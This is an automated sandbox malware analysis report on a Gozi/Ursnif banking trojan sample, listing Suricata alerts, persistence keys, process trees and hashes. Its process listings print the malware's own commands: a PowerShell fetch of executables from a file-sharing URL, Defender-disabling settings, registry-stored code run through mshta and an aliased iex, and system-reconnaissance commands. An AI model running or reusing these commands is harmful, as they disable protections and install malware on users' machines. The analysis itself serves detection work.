Malware Analysis Report

2025-08-05 13:07

Sample ID 220322-r8mfyaceen
Target 6239dfea99c25.exe
SHA256 b6814794481de92b96493819677c96320d500487b82fd6eb72018faba8a831eb
Tags
persistence gozi_ifsb 3000 banker suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b6814794481de92b96493819677c96320d500487b82fd6eb72018faba8a831eb

Threat Level: Known bad

The file 6239dfea99c25.exe was found to be: Known bad.

Malicious Activity Summary

persistence gozi_ifsb 3000 banker suricata trojan

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

Gozi, Gozi IFSB

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

Blocklisted process makes network request

Executes dropped EXE

Downloads MZ/PE file

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Enumerates processes with tasklist

Runs net.exe

Runs ping.exe

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Gathers system information

Discovers systems in the same network

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-22 14:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-22 14:51

Reported

2022-03-22 14:55

Platform

win7-20220310-en

Max time kernel

4294180s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe

"C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"

C:\Windows\system32\cmd.exe

cmd /c bruhad.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath "C:\Users"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/looad.exe -o looad.exe"

Network

N/A

Files

memory/1748-54-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bruhad.bat

MD5 f56ed5a6dee080b2080405796355bc58
SHA1 6f29cb664ce19a254c6c7d1436ff754ae68b635b
SHA256 951106a041a46a2be56703e3b5efbbeb383475e94a9aee8e22d71ed90ca09ce8
SHA512 2239b58ba02e991703bb8cef9c88e43024d51829bb8f39fb69fc4830f14ae692fb649bba4d81978a5d161d7d92089390b4fdf290dd7d38dc2e1aaefc14217c98

memory/1268-57-0x000007FEEFE70000-0x000007FEF09CD000-memory.dmp

memory/1268-59-0x00000000024D0000-0x00000000024D2000-memory.dmp

memory/1268-58-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

memory/1268-60-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp

memory/1268-62-0x00000000024D2000-0x00000000024D4000-memory.dmp

memory/1268-63-0x00000000024D4000-0x00000000024D7000-memory.dmp

memory/1268-61-0x000000001B890000-0x000000001BB8F000-memory.dmp

memory/1268-64-0x00000000024DB000-0x00000000024FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6ee1cfe8acf43b4309d92f322cc279f5
SHA1 9bf321068b130957648a692327d84477d1a372aa
SHA256 9db8abfdc224502b8cabb897921344e02f548fcd7787ebfb21aa68924294787e
SHA512 766f0a288335bcc3aba321f1ac2c2f13ca72d9807cd6c4eb37748ade7e06973d6cc8e30787702d978ffc1eb0f2d5c112a334ba34be7447437851f67a62d31ca4

memory/1792-67-0x000007FEF38C0000-0x000007FEF441D000-memory.dmp

memory/1792-69-0x0000000002650000-0x0000000002652000-memory.dmp

memory/1792-68-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

memory/1792-71-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

memory/1792-70-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

memory/1792-73-0x0000000002652000-0x0000000002654000-memory.dmp

memory/1792-72-0x000000000265B000-0x000000000267A000-memory.dmp

memory/1792-74-0x0000000002654000-0x0000000002657000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-22 14:51

Reported

2022-03-22 14:55

Platform

win10v2004-en-20220113

Max time kernel

150s

Max time network

138s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

suricata

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

suricata

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

suricata

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1524 set thread context of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2688 set thread context of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 set thread context of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 set thread context of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2296 set thread context of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2688 set thread context of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 set thread context of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1488 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe C:\Windows\SYSTEM32\cmd.exe
PID 1488 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe C:\Windows\SYSTEM32\cmd.exe
PID 1708 wrote to memory of 2252 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 2252 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 4524 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 4524 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 4712 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe
PID 1708 wrote to memory of 4712 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe
PID 4712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe C:\Windows\system32\cmd.exe
PID 4712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe C:\Windows\system32\cmd.exe
PID 1608 wrote to memory of 1816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 1816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe
PID 1608 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe
PID 1608 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe
PID 404 wrote to memory of 1524 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 1524 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1524 wrote to memory of 5048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1524 wrote to memory of 5048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5048 wrote to memory of 4536 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5048 wrote to memory of 4536 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1524 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1524 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1816 wrote to memory of 4216 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1816 wrote to memory of 4216 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1524 wrote to memory of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1524 wrote to memory of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1524 wrote to memory of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1524 wrote to memory of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2688 wrote to memory of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2688 wrote to memory of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2688 wrote to memory of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 4848 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2688 wrote to memory of 4848 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4848 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe

"C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c bruhad.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath "C:\Users"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/looad.exe -o looad.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe

looad.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\65BC.tmp\65BD.tmp\65BE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Remove-MpThreat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Set-MpPreference -ExclusionExtension exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath "C:\Users"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Set-MpPreference -MAPSReporting 0ΓÇï"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -command "Set-MpPreference -SubmitSamplesConsent 2"ΓÇï

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/load.exe -o load.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe

load.exe

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Y03p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Y03p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xadjxtwdw -value gp; new-alias -name lhnwkd -value iex; lhnwkd ([System.Text.Encoding]::ASCII.GetString((xadjxtwdw "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x3inmo35\x3inmo35.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2572.tmp" "c:\Users\Admin\AppData\Local\Temp\x3inmo35\CSCAD89A661A4034B56BD98BEBDC6FA94CA.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3kgaxgp0\3kgaxgp0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES268C.tmp" "c:\Users\Admin\AppData\Local\Temp\3kgaxgp0\CSC6E24615EF38442F7BFB7EE57DB209138.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\EE19.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EE19.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\driverquery.exe

